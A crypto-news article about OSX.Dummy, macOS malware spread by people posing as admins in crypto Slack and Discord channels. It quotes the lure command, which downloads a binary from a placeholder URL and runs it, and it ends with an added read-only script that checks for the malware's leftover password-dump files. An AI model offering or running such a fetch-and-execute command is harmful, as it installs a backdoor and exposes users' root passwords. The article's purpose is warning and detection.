“Dumb” Malware Targets Mac Crypto Miners

THELOGICALINDIAN - Mac miners beware: black hats are attempting to infect machines with malware that has been dubbed OSX.Dummy.

Dumb Malware Created to Trap Dumb Mac Users

Crypto enthusiasts who frequent discussion channels on Slack, Discord and possibly other messaging platforms should be forewarned that, if they use a Mac, someone may be trying to lure them into a trap. The culprits impersonate administrators on these platforms and encourage members to copy and paste a long command into a Terminal window on their machines. The command establishes a remote connection that can act as a backdoor for the attacker once it downloads and executes the 34-megabyte malware file.

The command, below, would download a binary named “script” to the /tmp folder and then run it as root.

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Mac malware expert Patrick Wardle analyzed the bug and named it “OSX.Dummy”, as reported by Ars Technica, where he broke it down into all its dumb aspects:

the infection method is dumb
the massive size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are rather limited (and thus rather dumb)
it’s trivial to detect at every step (that dumb)
… and finally, the malware saves the user’s password to dumpdummy

The malware was discovered last week by Remco Verhoef, an ISC SANS handler and founder of DutchSec. Thomas Reed, one of several Mac malware experts who analyzed the infection, said,

 “We don’t yet know exactly what the hacker(s) behind the malware may intend to do with access to the infected machines, but given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency,”

Mac Cryptocurrency Miners Targeted

Wardle warned that the victim’s macOS root password, stored as cleartext in the files /Users/Shared/dumpdummy and /tmp/dumpdummy, will most likely be used for malicious activity in the future.

All three experts agree that the malware is basic in its function, but that even if users remove the OSX.Dummy malware itself, the password file may remain if the infection isn’t cleaned out of the machine properly.
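Because the leftover password dump is the part of this infection that outlives the malware, a cleanup check should look for the file artifacts the article names rather than only for the running binary. The script below is an added example written for this page; it is not code from the article, from Wardle, Reed or Verhoef. It assumes a ROOT argument (defaulting to /) so the same check can be pointed at a constructed test tree, and it only reports matching paths, leaving removal to the operator.

```shell
#!/bin/sh
# Added example: read-only check for the OSX.Dummy file artifacts named in the article.
# Paths are relative to ROOT (assumed parameter) so the check can be tested offline.

# Artifacts from the article: the cleartext password dumps and the downloaded binary.
DUMMY_ARTIFACTS="Users/Shared/dumpdummy tmp/dumpdummy tmp/script"

# check_dummy_artifacts [ROOT]
# Prints each artifact path that exists under ROOT.
# Returns 0 when nothing was found, 1 when at least one artifact is present.
check_dummy_artifacts() {
    root="${1:-/}"
    found=0
    for rel in $DUMMY_ARTIFACTS; do
        path="${root%/}/$rel"
        if [ -e "$path" ]; then
            echo "FOUND: $path"
            found=1
        fi
    done
    return $found
}

# make_sample_tree DIR
# Builds a constructed directory tree that mimics an infected host, so the check
# can be exercised without a real infection. The file contents are made up.
make_sample_tree() {
    dir="$1"
    mkdir -p "$dir/Users/Shared" "$dir/tmp"
    printf 'constructed-sample-password\n' > "$dir/Users/Shared/dumpdummy"
    : > "$dir/tmp/script"
}

# Demonstration on a constructed tree; the live system is not touched.
# For a real check run:  check_dummy_artifacts /
demo_dir=$(mktemp -d)
make_sample_tree "$demo_dir"
if check_dummy_artifacts "$demo_dir"; then
    echo "no OSX.Dummy artifacts under $demo_dir"
else
    echo "artifact(s) present under $demo_dir; remove them and rotate the root password"
fi
rm -rf "$demo_dir"
```

The check deliberately tests for the password dumps in both locations, since removing only the binary in /tmp leaves the copy under /Users/Shared behind, which is exactly the residue the experts warn about.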

As Reed detailed, “Future malware could be designed to find the locations of these files created by the [OSX.Dummy] malware, gaining access to your password for free,” adding in his blog post that “if users are so careless and unaware of the dangers of running code they copied from an online forum, they most likely have no clue about security best practices to begin with.”